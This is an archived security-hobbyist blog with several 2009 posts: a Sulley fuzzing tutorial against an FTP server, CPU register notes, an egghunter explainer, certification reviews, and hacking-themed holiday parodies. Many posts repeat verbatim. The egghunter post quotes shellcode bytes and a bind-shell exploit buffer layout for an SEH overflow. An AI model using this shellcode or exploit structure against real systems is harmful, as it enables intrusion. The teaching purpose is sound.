Ref.: Gray Hat Python
The framework is coded entirely from Python and is open source.
Developed by Pedram Amini and Aaron Portmoy from Tipping Point, Sulley is a fuzzer packed with interesting capabilities. Such as packet-capturing, crash reporting and VMware automation. It also has the capability to restart the target application in the event of a crash. Then continues on with the fuzzing process.
For data generation, Sulley uses a block-based fuzzing, the same method used as Dave Aitel's SPIKE. So if you're familiar with SPIKE, you shouldn't have much trouble with this fuzzer. In block based fuzzing, you build up a general skeleton for the protocol or file you are fuzzing. There's going to be an example later in this post.
One great feature this fuzzer has over others, is the ability to show the CPU's registers at the moment of the crash. Sulley comes with PyDBG, and once the framework installed it uses this to monitor the process you are fuzzing. Another one is Sulley's ability to monitor the network (using pcapy), capturing every "fuzz" sent to the target. Creating one pcap file for each attempt. This way you can follow your progress, or review your fuzzing session. Lastly, you can even see the fuzzing progress via an HTML page. The page shows you which variable it's currently fuzzing and it's progress.
Sulley Primitives
Strings
Sulley uses the s_strings() directive to denote that the data contained is a fuzzable string. So we wantd to fuzz an email address, we'd declare it like this in our skeleton:
s_string("fuzzing@sulley.com")
This tells Sulley it's a valid value, so it will fuzz that string and exhaust all reasonable possibilities. Once it's finished, it will revert to it's original value and continue fuzzing the rest of the declared values down the file.
Delemiters
This is just a small string that helps break up larger ones. If we take our email example from above, the delimiter would be the "@" sign. This is how we'd passe this primitive on to Sulley:
s_string("fuzzing")
s_delim("@")
s_string("sulley")
s_delim(".")
s_string("com").
Like the s_string() primitive, the delimiter is also fuzzed. In this example, odds are the "." is a value we really don't need to so we can tell Sulley to not fuzz it like so:
s_delim(".", fuzzable=false)
Static
The values passed to a static string, remind unchanged (or un-fuzzed I suppose).
s_static("\r\n")
So let's take a look at a complete, yet small and simple, skeleton file. In this example, we'll look at the FTP protocol.
# import all of Sulley's functionality
# We'll call this file ftp_ability.py
from sulley import *
s_initialize("user")
s_static("USER")
s_delim(" ")
s_static("ftp")
s_static("\r\n")
s_initialize("pass")
s_static("PASS")
s_delim(" ")
s_static("ftp")
s_static("\r\n")
s_initialize("stor")
s_static("STOR")
s_delim(" ")
s_string("AAAA")
s_static("\r\n")
You can see, it's pretty simple. This file basically feeds Sulley with starting values and it takes it from there. Fuzzing the fields you denoted as fuzzable. In this case; the username, password and the STOR command. Depending on the target FTP server, you'll add and/or remove commands. Not every FTP server will have "STOR", and not all of them have "LIST" ... So this is where you'd supply a valid list of commands.
Now that we've seen our blocks, lets take a look at the session file. The file that starts the whole fuzzable process.
from sulley import * # import everything from Sulley
from requests import ftp_ability # this is our ftp_ability.py file from requests folder
def receive_ftp_banner(sock):
sock.recv(1024)
sess = sessions.session(session_filename="audits/ability.session")
#Target IP xxx.xxx.xxx.xxx
target = sessions.target("xxx.xxx.xxx.xxx", 21)
target.netmon = pedrpc.client("xxx.xxx.xxx.xxx", 26001)
target.procmon = pedrpc.client("xxx.xxx.xxx.xxx", 26002)
target.procmon_options = { "proc_name" : "Ability Server.exe" }
sess.pre_send = receive_ftp_banner #grab the banner
sess.add_target(target)
sess.connect(s_get("user")) # Notice our commands from the previous file
sess.connect(s_get("user"),s_get("pass"))
# This tells Sulley user must be authenticated to use this command
sess.connect(s_get("pass"),s_get("stor"))
sess.fuzz()
Because most FTP servers send a banner, we tell Sulley to wait for it before fuzzing any data.
The next thing, is the session file which keeps track of our overall session. This allows us to stop and restart our fuzzing where we had previously left off.
After that we define our target with the appropriate IP and port number. In this case, a FTP server.
After defining the target, we tell our network sniffer to set itself up on the same host and listening on 26001.
Last we tell our debugger is listening on the same host and that is listening on 26002.
We chain in the authentication commands and tell Sulley to start fuzzing.
To start the fuzzing process, we need to have Sulley installed on 2 machines (I find it less confusing this way). The attacking and victim machines.
From the target machine
1: start the process we want to fuzz (this case Ability Server)
2: attach the process monitor to our server.
C:\sulley>python process_monitor.py -c c:\ability.crash -p "Ability Server.exe"
3: attach the network monitor to our network card and have it sniff for specific traffic. The -P parameter is to store your pcaps file. You must create this folder first. You can use a mapped drive too.
C:\sulley>python network_monitor.py -d 1 -f "src or dst port 21" -P z:\
From our attacking machine
1: execute the session file from Sulley's root directory
C:\sulley>python ftp_session_ability.py
Once the process has started, you can point your browser to the attacking machine's IP on port 26000 to get a progress report. You need to manually refresh the page. Once the application crashes, you'll be able to see the crash report on the page. Enabling you to see what/where was overwritten in the CPU's registry.
You can get the install executable here
And the PDF here
Here's a video on kioptix.com demonstrating all of this. Using the same files and vulnerable application mentioned above. Thanks to dookie for pointing out a few mistakes of mine while I was setting up Sulley for the first time. Also the Gray Hat Python book that gave me a good push with this.
Next week, fuzzing the wife to get.. wait wrong blog.
Sunday, December 27, 2009
Saturday, December 19, 2009
General purpose CPU register
I just needed to type this somewhere so I don't forget. Maybe by putting it here, it will be of some use to others.
A CPU uses 8 general purpose registers: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX.
Each register is design for a particular purpose, and each performs a function that enables the CPU to efficiently process information.
The EAX register, is used to perform calculations as well as storing return values from function calls. Basic operations ilke add, subtract, and compare are optimized to use the EAX register. More specialized operations like multiplication and dvision can occur only within the EAX register.
The EDX is the data register. It's basically an extension of EAX to assist it in storing extra data for complex operations. It can also be used for general purpose data storage.
The ECX, also called the count register, is used for looping operations. The repeated operations could be storing a string or counting numbers.
The ESI and EDI relied upon by loops that process data. The ESI register is the source index for data operation and holds the location of the input data stream. The EDI points to the location where the result of data operation is stored, or the destination index.
ESP is the stack pointer, and EBP is the base pointer. These registers are used for managing function calls and stack operations. When a function is called, the function's arguments are pushed on the stack and are followed by a return address. The ESP register points to the very top of the stack, so it will point to the return address. EBP is used to point to the bottom of the call stack.
EBX is the only register that was not designed for anything specific. It can be used for extra storage.
EIP is the register that points to the current instruction being executed. As the CPU moves through the binary executing code, EIP is updated to reflect the location where the execution is occuring.
A CPU uses 8 general purpose registers: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX.
Each register is design for a particular purpose, and each performs a function that enables the CPU to efficiently process information.
The EAX register, is used to perform calculations as well as storing return values from function calls. Basic operations ilke add, subtract, and compare are optimized to use the EAX register. More specialized operations like multiplication and dvision can occur only within the EAX register.
The EDX is the data register. It's basically an extension of EAX to assist it in storing extra data for complex operations. It can also be used for general purpose data storage.
The ECX, also called the count register, is used for looping operations. The repeated operations could be storing a string or counting numbers.
The ESI and EDI relied upon by loops that process data. The ESI register is the source index for data operation and holds the location of the input data stream. The EDI points to the location where the result of data operation is stored, or the destination index.
ESP is the stack pointer, and EBP is the base pointer. These registers are used for managing function calls and stack operations. When a function is called, the function's arguments are pushed on the stack and are followed by a return address. The ESP register points to the very top of the stack, so it will point to the return address. EBP is used to point to the bottom of the call stack.
EBX is the only register that was not designed for anything specific. It can be used for extra storage.
EIP is the register that points to the current instruction being executed. As the CPU moves through the binary executing code, EIP is updated to reflect the location where the execution is occuring.
Friday, December 11, 2009
Looking at EggHunters...
Buffer overflows can be a daunting part of exploitation, almost esoteric in nature if you don't have an idea of what's going on in the back ground. A little while ago I posted an exercise for Easy Chat Server with a proof of concept. If you successfully accomplished the task, you may like this little entry: Egghunters.
An egghunter is a bit of code that, once executed, will search the memory for a specific string called "the egg". Once it's found the egg, your shellcode is then executed. Well so far it doesn't seem to complicated does it?
So why would you want this solution to exploit a buffer overflow vulnerability? Well, once you've overwritten EIP and jump to your buffer where the shellcode would go. What would happen if you only had about 50 bytes of usable space? This would be a nice example of when an egghunter would be used.
The egghunter itself is about 32 bytes, the egg is 4 bytes (times 2) and then you have your shellcode. When you send your "evil buffer", the egghunter is placed in the part of memory you overwrite. The shellcode is stuffed somewhere else, its location unknown to us. Once EIP is pointed to your buffer space, the hunter is executed and then searches the memory for your shellcode. To put it roughly, it would look like this: offset + egghunter + egg + shellcode.
As long as the egghunter fits the buffer space EIP is sending you, you're in business.
Here's a nice example of code using the egghunter method. It was coded by Dr_IDE (an OSCP graduate) and dookie2000ca (star quarter-back for the Edmonton Roughriders back in '86). It's well coded and very easy to read.
Eureka Mail BoF SEH
So let's try and break down the above exploit shall we?
First we have the egghunter. Notice the commented part "This is the egg: w00t"
The hunter is setup to look for the string "w00t" in memory. It loops though and compares the value to
The next few parts of the file is pretty standard stuff. Return address, short jumps and nop slide... Won't go into that, but let me direct your attention to the last part. Where the buffer is built:
There is one down side to using the egghunter method. It's CPU intensive. Once the egghunter is execute it will go through the roof, and reach 100%. On the other hand, you'll be able to send almost any sized payload.
Here's a very interesting video showing an egghunter. It's from Offensive-Security's video vault.
HP NNM from Bug to 0day
I'll try and post a video on kioptix.com showing the egghunter in action. The above video is very clear in explaining, but the video quality can be lacking at times (but not very).
EDIT:
skape's original paper on egghunters
Link to a video of an Egghunter in action here
An egghunter is a bit of code that, once executed, will search the memory for a specific string called "the egg". Once it's found the egg, your shellcode is then executed. Well so far it doesn't seem to complicated does it?
So why would you want this solution to exploit a buffer overflow vulnerability? Well, once you've overwritten EIP and jump to your buffer where the shellcode would go. What would happen if you only had about 50 bytes of usable space? This would be a nice example of when an egghunter would be used.
The egghunter itself is about 32 bytes, the egg is 4 bytes (times 2) and then you have your shellcode. When you send your "evil buffer", the egghunter is placed in the part of memory you overwrite. The shellcode is stuffed somewhere else, its location unknown to us. Once EIP is pointed to your buffer space, the hunter is executed and then searches the memory for your shellcode. To put it roughly, it would look like this: offset + egghunter + egg + shellcode.
As long as the egghunter fits the buffer space EIP is sending you, you're in business.
Here's a nice example of code using the egghunter method. It was coded by Dr_IDE (an OSCP graduate) and dookie2000ca (star quarter-back for the Edmonton Roughriders back in '86). It's well coded and very easy to read.
Eureka Mail BoF SEH
So let's try and break down the above exploit shall we?
First we have the egghunter. Notice the commented part "This is the egg: w00t"
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74" # this is the egg: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")The hunter is setup to look for the string "w00t" in memory. It loops though and compares the value to
"\x77\x30\x30\x74". It will loop until it finds the egg, break out of the loop and execute the shellcode found directly after it.The next few parts of the file is pretty standard stuff. Return address, short jumps and nop slide... Won't go into that, but let me direct your attention to the last part. Where the buffer is built:
sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);
As you can see, we have our egg there. The hunter will look for 2 instances of the string "w00t" in a row, and execute the code following it.
There is one down side to using the egghunter method. It's CPU intensive. Once the egghunter is execute it will go through the roof, and reach 100%. On the other hand, you'll be able to send almost any sized payload.
Here's a very interesting video showing an egghunter. It's from Offensive-Security's video vault.
HP NNM from Bug to 0day
I'll try and post a video on kioptix.com showing the egghunter in action. The above video is very clear in explaining, but the video quality can be lacking at times (but not very).
EDIT:
skape's original paper on egghunters
Link to a video of an Egghunter in action here
Tuesday, December 8, 2009
HackUS 2010 CTF Event
HackUS First Edition, is a capture the flag event being held in Sherbrooke Quebec in April of 2010. The event will last a full 48 hours which is guaranteed to keep you from actually doing any sleep.
More details can be found on there website: HackUS
Also, here are a few of the prizes made available thanks to Offensive-Security's generosity:
PWB w/ 60 day lab access
CTP w/ 60 day lab access
Now that's what I called an incentive to participate.
Registration is only 110$ CAD and includes meals and accommodations, with transportation from the hotel to the event site. It's 50$ CAD if you don't want a hotel room (or plan on not sleeping).
I had the pleasure of e-mailing one of the organizers. Must say, very nice and he's obviously
into Information Security. The Sherbrooke team came in second place at the Hackfest.ca CTF event this past November. Just one point shy of the UQAM team. I'm sure you guys will get your revenge in April.
So if any of you are near the Quebec boarder, I highly recommend this. Check out their site and hope to see you there.
I'll be participating, but will only send in my registration fees after Christmas... bills bills bills
More details can be found on there website: HackUS
Also, here are a few of the prizes made available thanks to Offensive-Security's generosity:
PWB w/ 60 day lab access
CTP w/ 60 day lab access
Now that's what I called an incentive to participate.
Registration is only 110$ CAD and includes meals and accommodations, with transportation from the hotel to the event site. It's 50$ CAD if you don't want a hotel room (or plan on not sleeping).
I had the pleasure of e-mailing one of the organizers. Must say, very nice and he's obviously
into Information Security. The Sherbrooke team came in second place at the Hackfest.ca CTF event this past November. Just one point shy of the UQAM team. I'm sure you guys will get your revenge in April.
So if any of you are near the Quebec boarder, I highly recommend this. Check out their site and hope to see you there.
I'll be participating, but will only send in my registration fees after Christmas... bills bills bills
Saturday, December 5, 2009
OSCP vs PTF
I recently completed 2 security related certifications. The first is Offensive-security's "OSCP" (Pentesting With Backtrack) and the other is Heorot's PTF (Pentesting Fundamentals).
Here is where you can find more information on both certifications:
Pentesting Fundamentals: Heorot
OSCP : Offsec
The point of this blog is not to "bash" or "flame" one certification. Both are challenging and interesting in their own way. It's just that, depending on how you look at it, one is more advanced then the other. Seeing that difficulty is very relative to each individual person, if I refer one as being more "difficult" keep in mind it's my opinion.
Let's start off by describing each training course, let's talk about Heorot's PTF.
Once a student starts the course, he receives an e-mail with links and access codes to the online training material. This is comprised of videos, slides and documents. Also, 2 live CD images are needed for the course. The first CD is the first De-ICE live CD used during the course itself. The second is the vulnerable system which is your target to complete the course. You get to run a mock pentest on this system following the methodology (based on the ISSAF) learned in the course. Once you've finished, you write up your report as explained in the ISSAF and send it on it's way for review/grading.
Offensive-Security's PWB takes a different approach. Once the course starts (classes start on a saturday), the student gets an e-mail with access to the course material (video and PDF) and access to an online lab. Through out the course, the student gets to follow the teacher and practice on live hosts (in secure and legal environment). Students get the chance to run scans, exploits and other techniques on various operating systems. Once all the exercises completed, an exam is scheduled. Upon completion of the exam, the fail or pass e-mail is sent within 72 hours.
So in a nutshell, they are both courses that teach you about penetration testing. One is more documentation/methodology driven, and the other has a more "hands on" approach.
So which is better ?
Which one should you take ?
Which one should you take first ?
Which one is harder/easier ?
Which one is worth it ?
Well.. The answer to all those questions really depend on one's personal skill level and experience. When I started OSCP, I had no prior experience with exploits/metasploit and other info-sec related activities. I did however have a pretty good knowledge of the Linux operating system, networking and programming. Even with all that, I found the course extremely challenging if not out of my league at times. Still with some effort and research, I still managed to pass the 24 hour exam and receive my certification.
After doing all that, I waited a few months and tried my hand with Heorot's fundamentals course. Being a fundamentals course, and documentation/methodology driven, the penetration and exploitation of the target system was easy in comparison to OSCP. The goal in PTF is not to see if you can "pop a box", but properly produce a penetration report following certain guidelines.
As you can see, depending on what you already know (or don't know) both certifications can have a strong learning curve. For me, well PTF was a bit of a disappointment seeing the cost and time it's taking to grade my report.
[as of today it's been over a week and still no news]
So for the cost, in my opinion, if you already have experience with vulnerability scanners, frameworks such as Metasploit / w3af etc, go for OSCP. Once you've done that, nothing stops you from downloading the ISSAF methodology documentation free from their website. If you don't have any prior experience, then PTF would be a good place to start. You get to learn the basic tools, such as nmap & hydra, and properly conduct a pentest from A to Z.
The answers to all my previous questions above all comes down to this:
It depends on you....
Thanks for reading.
Here is where you can find more information on both certifications:
Pentesting Fundamentals: Heorot
OSCP : Offsec
The point of this blog is not to "bash" or "flame" one certification. Both are challenging and interesting in their own way. It's just that, depending on how you look at it, one is more advanced then the other. Seeing that difficulty is very relative to each individual person, if I refer one as being more "difficult" keep in mind it's my opinion.
Let's start off by describing each training course, let's talk about Heorot's PTF.
Once a student starts the course, he receives an e-mail with links and access codes to the online training material. This is comprised of videos, slides and documents. Also, 2 live CD images are needed for the course. The first CD is the first De-ICE live CD used during the course itself. The second is the vulnerable system which is your target to complete the course. You get to run a mock pentest on this system following the methodology (based on the ISSAF) learned in the course. Once you've finished, you write up your report as explained in the ISSAF and send it on it's way for review/grading.
Offensive-Security's PWB takes a different approach. Once the course starts (classes start on a saturday), the student gets an e-mail with access to the course material (video and PDF) and access to an online lab. Through out the course, the student gets to follow the teacher and practice on live hosts (in secure and legal environment). Students get the chance to run scans, exploits and other techniques on various operating systems. Once all the exercises completed, an exam is scheduled. Upon completion of the exam, the fail or pass e-mail is sent within 72 hours.
So in a nutshell, they are both courses that teach you about penetration testing. One is more documentation/methodology driven, and the other has a more "hands on" approach.
So which is better ?
Which one should you take ?
Which one should you take first ?
Which one is harder/easier ?
Which one is worth it ?
Well.. The answer to all those questions really depend on one's personal skill level and experience. When I started OSCP, I had no prior experience with exploits/metasploit and other info-sec related activities. I did however have a pretty good knowledge of the Linux operating system, networking and programming. Even with all that, I found the course extremely challenging if not out of my league at times. Still with some effort and research, I still managed to pass the 24 hour exam and receive my certification.
After doing all that, I waited a few months and tried my hand with Heorot's fundamentals course. Being a fundamentals course, and documentation/methodology driven, the penetration and exploitation of the target system was easy in comparison to OSCP. The goal in PTF is not to see if you can "pop a box", but properly produce a penetration report following certain guidelines.
As you can see, depending on what you already know (or don't know) both certifications can have a strong learning curve. For me, well PTF was a bit of a disappointment seeing the cost and time it's taking to grade my report.
[as of today it's been over a week and still no news]
So for the cost, in my opinion, if you already have experience with vulnerability scanners, frameworks such as Metasploit / w3af etc, go for OSCP. Once you've done that, nothing stops you from downloading the ISSAF methodology documentation free from their website. If you don't have any prior experience, then PTF would be a good place to start. You get to learn the basic tools, such as nmap & hydra, and properly conduct a pentest from A to Z.
The answers to all my previous questions above all comes down to this:
It depends on you....
Thanks for reading.
Wednesday, December 2, 2009
A bit of information
An interesting article on VPN attacks that bypass browser security. My colleague sent this link, pretty good read.
US-CERT Wars Of VPN Attack
Interesting site lets you search specific countries and open ports. Try it out for yourself, it's not perfect but pretty cool. (ie.: port:22 country:ca)
SHODAN
------
A SANS article:
--Microsoft Looking Into Black Screen Problem
(November 30, 2009)
Microsoft is investigating reports that security updates it released in
November are causing black screens on some users' computers. The
updates allegedly change Access Control List (SCL) entries in the
registry. The problem appears to affect computers running Windows 7,
Vista and XP.
Related articles:
TechWorld
CNet
------
Backtrack 4 is up to kernel 2.6.30.7
If you have a problem with "PostgresSQL 8.3" on boot up after a dist-upgrade. Here's a fix that worked me. Just edit the postgresql.conf file found
/etc/postgresql/8.3/main and set "ssl" to false.
If you do need ssl if you here's a link to fix that as well: link
Also if you update/upgrade everything, you may end up with one package that won't upgrade for some reason. This has been mentioned in the Remote-Exploit forum, but has yet to be addressed as far as I can tell.
Package: Backtrack-sniffers
# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
backtrack-sniffers
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
------
I guess by now, everyone knows that Metasploit now has colour. Have to admit, it does look good. Also the colour seems to help me out.
There's also an interesting article recently written about Rapid7's NeXpose Community Edition. A free version of their commercial software with Metasploit integrated into it.
Penetration Testing in the Marketplace 2010
and
Rapid7 Releases Free version of Nexpose
------
Well don't have much time to try out anything really security related these days. So I'll try and pass on information I fall on for the next few weeks. Remember to visit us on our website Kioptrix.com. The site ain't finished but should be up and running by the end of December. So in the mean time, download the VMs tells us what you think. If you have built a few vulnerable VMs images yourself, place comment here and we'll do our best to host them.
Have a good one.
Monday, November 30, 2009
New home soon...
My blog will have a new permanent home soon. A friend and I have setup a small website, and I'll be moving this blog there. Going to be fun, I'll be able to post screen-shots and better serve the public with my small IT tutorials and everyday sysadmin rants...
At the moment the site is not 100% complete. It does have many links to tools, videos, articles and RSS feeds we find interesting. We also have 2 vulnerable VM images one can practice scans and penetration methods. We hope people will enjoy it.
The site's purpose is gather as much information relating to IT security and place it in one neat little package. We are fully aware of the fact that many sites like this exists, but one more won't hurt. If it can help one or two people find an interesting fact on security I'll be happy. The website will be re-written in French so as to better serve the people in my region... and perhaps even a pod-cast (French). We don't pretend to be the best in this field, but we are 2 guys willing to learn and share.
So to everyone who actually reads my blog (yes all 2 of you), thanks hope you visit the site.
Kioptrix
At the moment the site is not 100% complete. It does have many links to tools, videos, articles and RSS feeds we find interesting. We also have 2 vulnerable VM images one can practice scans and penetration methods. We hope people will enjoy it.
The site's purpose is gather as much information relating to IT security and place it in one neat little package. We are fully aware of the fact that many sites like this exists, but one more won't hurt. If it can help one or two people find an interesting fact on security I'll be happy. The website will be re-written in French so as to better serve the people in my region... and perhaps even a pod-cast (French). We don't pretend to be the best in this field, but we are 2 guys willing to learn and share.
So to everyone who actually reads my blog (yes all 2 of you), thanks hope you visit the site.
Kioptrix
Saturday, November 28, 2009
Twas the Night before Christmas...
[Hope you enjoy this one, wasn't easy]
Original poem
Twas the night before Christmas, when all through the house
Not a creature was stirring, not even a mouse.
The vulnerabilities were left on the system with care,
In hopes no metasploit script would soon be there.
The admins were nestled all snug in their bed,
While visions of security patches danced in their heads.
With project manager in her ‘kerchief’, and I in my cap,
Had just settled our brains to play with ettercap.
When out on the network, there arose such a clatter,
I sprang from my desk to see what was the matter.
Away to the console I flew like a flash,
Tore open the screen and threw up bash.
The logs on the breast of the new-fallen server
Gave a luster of panic on the new hired manager.
When, what to my wondering eyes should behold,
But a miniature script and eight services controlled.
With a little old script, so lively and quick,
I knew in a moment it was an ol’ HDM trick.
More slick than snakes his courses they came,
And he exploited, and rooted, and called them by name!
“Down CUPS! Down Apache, now Samba and Dixie!
On, Muts! On, Bolexx! on, on Dookie and HD!
To the top of the tree! To the edge of the firewall!
Now compile away! Compile away! Using dash wall.”
As fast typists that before the wild hurricane fly,
When they meet with an obstacle, they do not cry.
So up to the firewall the courses they flew,
With a bag full of root-kits, and with Mitnick too…
And then, in a twinkling, I stared at the rack.
The prancing and pwning of each little hack.
As I ran through the office, cursing around,
Down came the server, which was PCI sound.
As it fell to the ground, from RAM to wire,
And its casing had tarnished this I did not desire.
A bundle of overflows thrown on the stack,
The server looked like a peddler, with a hump on its back.
With hard drives dwindling! Its lights not so merry!
Its IO count rising, Its CPU red like a cherry!
Its droll little services all dropping in a row,
The last remnants of the server, stalked by a crow.
With power cable held tight in my crasp,
And the smoke it encircled, it looked like an asp.
It had blown condensers I found on the floor,
That I took and laughed, as I threw out the door.
It was busted and broken, a right jolly old elf,
And I laughed when I trashed it, in spite of myself!
With a wink of my eye, and a twist of my head,
The new manager knew she had something to dread
She spoke not a word, but went straight to her desk.
And looked at the firewall purchase, and then was perplexed.
And laying her face inside her cupped hands,
Unable to move, unable to stand!
As I sprang from the server room, gave the team a whistle,
Away we all went, all flew like down of a thistle.
As we exclaimed while we left, ‘ere we drove out of sight,
"Merry Christmas to all, and to all a good-night!"
Original poem
Twas the night before Christmas, when all through the house
Not a creature was stirring, not even a mouse.
The vulnerabilities were left on the system with care,
In hopes no metasploit script would soon be there.
The admins were nestled all snug in their bed,
While visions of security patches danced in their heads.
With project manager in her ‘kerchief’, and I in my cap,
Had just settled our brains to play with ettercap.
When out on the network, there arose such a clatter,
I sprang from my desk to see what was the matter.
Away to the console I flew like a flash,
Tore open the screen and threw up bash.
The logs on the breast of the new-fallen server
Gave a luster of panic on the new hired manager.
When, what to my wondering eyes should behold,
But a miniature script and eight services controlled.
With a little old script, so lively and quick,
I knew in a moment it was an ol’ HDM trick.
More slick than snakes his courses they came,
And he exploited, and rooted, and called them by name!
“Down CUPS! Down Apache, now Samba and Dixie!
On, Muts! On, Bolexx! on, on Dookie and HD!
To the top of the tree! To the edge of the firewall!
Now compile away! Compile away! Using dash wall.”
As fast typists that before the wild hurricane fly,
When they meet with an obstacle, they do not cry.
So up to the firewall the courses they flew,
With a bag full of root-kits, and with Mitnick too…
And then, in a twinkling, I stared at the rack.
The prancing and pwning of each little hack.
As I ran through the office, cursing around,
Down came the server, which was PCI sound.
As it fell to the ground, from RAM to wire,
And its casing had tarnished this I did not desire.
A bundle of overflows thrown on the stack,
The server looked like a peddler, with a hump on its back.
With hard drives dwindling! Its lights not so merry!
Its IO count rising, Its CPU red like a cherry!
Its droll little services all dropping in a row,
The last remnants of the server, stalked by a crow.
With power cable held tight in my crasp,
And the smoke it encircled, it looked like an asp.
It had blown condensers I found on the floor,
That I took and laughed, as I threw out the door.
It was busted and broken, a right jolly old elf,
And I laughed when I trashed it, in spite of myself!
With a wink of my eye, and a twist of my head,
The new manager knew she had something to dread
She spoke not a word, but went straight to her desk.
And looked at the firewall purchase, and then was perplexed.
And laying her face inside her cupped hands,
Unable to move, unable to stand!
As I sprang from the server room, gave the team a whistle,
Away we all went, all flew like down of a thistle.
As we exclaimed while we left, ‘ere we drove out of sight,
"Merry Christmas to all, and to all a good-night!"
Friday, November 27, 2009
BackTrack Christmas song
On the first day of Christmas my true love gave to me
(And) A copy of the backtrack CD
On the second day of Christmas my true love gave to me
Two short jumps
On the third day of Christmas my true love gave to me
Three local exploits
On the fourth day of Christmas my true love gave to me
Four WEP keys
On the fifth day of Christmas my true love gave to me
FIVE METASPLOIT MODULES....
On the sixth day of Christmas my true love gave to me
Six rainbow-tables
On the seventh day of Christmas my true love gave to me
Seven Window OpCodes
On the eighth day of Christmas my true love gave to me
Eight joomla exploits
On the ninth day of Christmas my true love gave to me
Nine Vista Patches
On the tenth day of Christmas my true love gave to me
Ten zero-days
On the eleventh day of Christmas my true love gave to me
Eleven ruby scripts
On the twelth day of Christmas my true love gave to me
Twelve sa passwords
(And) A copy of the backtrack CD
On the second day of Christmas my true love gave to me
Two short jumps
On the third day of Christmas my true love gave to me
Three local exploits
On the fourth day of Christmas my true love gave to me
Four WEP keys
On the fifth day of Christmas my true love gave to me
FIVE METASPLOIT MODULES....
On the sixth day of Christmas my true love gave to me
Six rainbow-tables
On the seventh day of Christmas my true love gave to me
Seven Window OpCodes
On the eighth day of Christmas my true love gave to me
Eight joomla exploits
On the ninth day of Christmas my true love gave to me
Nine Vista Patches
On the tenth day of Christmas my true love gave to me
Ten zero-days
On the eleventh day of Christmas my true love gave to me
Eleven ruby scripts
On the twelth day of Christmas my true love gave to me
Twelve sa passwords
Saturday, November 21, 2009
Can lack of training cause problems?
A few days ago at work, something extraordinarily stupid happened... The idea of purchasing bigger (more complicated), more powerful servers was suggested to get more performance out of our VMware infrastructure. Logic would agree with that; if you have a bigger hammer you can break bigger stones. Unfortunately in our current situation, we don't need bigger hammers. We need to better use the hammers we already have.
Training, it seems, is something small/medium business seem to overlook. They tend to think they need to spend whatever little money they have in equipment. Well in some circumstances it can be very useful, but in others simple training and understanding of the current technology can also squeeze out performance out of systems.
Let's take for example the growing popularity of visualization (I'm not talking about the little VMs home users run with VMplayer or that free VMware server). Let's face it, it's not easy to configure correctly. Key word is "correctly", if by any chance a manager is reading this... Once installed and correctly tweaked, that HP G5 or G6 can really give your money's worth. Coupled with a good storage system (again properly configured), a few of these machines will give out some good results, and host many virtual systems. Of course the package as a whole needs to be installed and configured correctly. And one way of insuring you get what you deserve out of your setup, is training. If you can't reap the complete benefits out of your current setup, changing everything won't change a thing.
So how can lack of training be a problem? Well lack of training leads to misconfiguration. Ill configured systems tend to not to run as well as they should. And let's face it, there's bound to be some security issues in something that is not properly configured.
VMware training is a few thousand bucks, and that knowledge stays forever...
New servers and that nice looking EMC will run you up in the tens of thousands...
Simple math really...
This rant has gone on for long enough.
Training, it seems, is something small/medium business seem to overlook. They tend to think they need to spend whatever little money they have in equipment. Well in some circumstances it can be very useful, but in others simple training and understanding of the current technology can also squeeze out performance out of systems.
Let's take for example the growing popularity of visualization (I'm not talking about the little VMs home users run with VMplayer or that free VMware server). Let's face it, it's not easy to configure correctly. Key word is "correctly", if by any chance a manager is reading this... Once installed and correctly tweaked, that HP G5 or G6 can really give your money's worth. Coupled with a good storage system (again properly configured), a few of these machines will give out some good results, and host many virtual systems. Of course the package as a whole needs to be installed and configured correctly. And one way of insuring you get what you deserve out of your setup, is training. If you can't reap the complete benefits out of your current setup, changing everything won't change a thing.
So how can lack of training be a problem? Well lack of training leads to misconfiguration. Ill configured systems tend to not to run as well as they should. And let's face it, there's bound to be some security issues in something that is not properly configured.
VMware training is a few thousand bucks, and that knowledge stays forever...
New servers and that nice looking EMC will run you up in the tens of thousands...
Simple math really...
This rant has gone on for long enough.
Monday, November 16, 2009
The new milw0rm... better then before?
Well, the new (or replacement) milw0rm has gone online. As you may, or may not know, the crew of Offensive-Security have taken over. Str0ke was very close to closing the site down. After the initial announcement, Offsec stepped in and offered to relieve him of some of the administrative duties (updates mostly).
So, is the new site better? I mean, how can you improve on such a simple concept. Have an exploit, have a link to said exploit. Well they've found a way to not only make it better, but they succeeded in making the site an educational tool.
With Offensive-Security certifications slowly growing in popularity, it makes perfect sense for a security company such as Offsec to maintain the most popular exploit repository on the web today. It's a great combination; they train you in identifying and using exploits (for defensive purposes) all at the same time guaranteeing the exploit used during the training are available.
Good idea...
But how is the site better. Let's start off by how everything is organized. It's separated in few sections. Remote Exploit, local exploit, web application and denial of service. The old milw0rm had a similar organizational schema, and they even had (or have I suppose... it's still up) a shell code section. Which for me was not very user friendly. What it didn't have was a web application section, which in my opinion is a good add-on by the Offsec crew. Even if they removed a few of the sections originality found on milw0rm, the new site is very easy to navigate.
The search option is also better all around. Searching by description, author, type (remote/local/DoS/etc), platform and port number. It's pretty quick too and gives out very good search results. The submit information is revamped and easy to follow to anyone who wishes to submit anything.
This last part is what makes this site stand-out from the rest. They are actually hosting the applications associated with the exploits. Not all of them mind you, but they do have many downloads available. So in time, I'm sure we'll see lots more vulnerable applications with their respective exploits ready to be transferred in our lab environment.
So in the end, Offensive-Security have legitimized the existence of such a site. With this new avenue, an exploit repository site doesn't have cater to "blackhats" looking to annoy people or deface websites. They are maintaining and making available a valuable knowledge base for the security professional in training.
Congrats to all that worked on the new site. It's fresh, good looking and I'm sure it's going to be around for a long long time...
Check them out:
Offensive-Security
New milw0rm
So, is the new site better? I mean, how can you improve on such a simple concept. Have an exploit, have a link to said exploit. Well they've found a way to not only make it better, but they succeeded in making the site an educational tool.
With Offensive-Security certifications slowly growing in popularity, it makes perfect sense for a security company such as Offsec to maintain the most popular exploit repository on the web today. It's a great combination; they train you in identifying and using exploits (for defensive purposes) all at the same time guaranteeing the exploit used during the training are available.
Good idea...
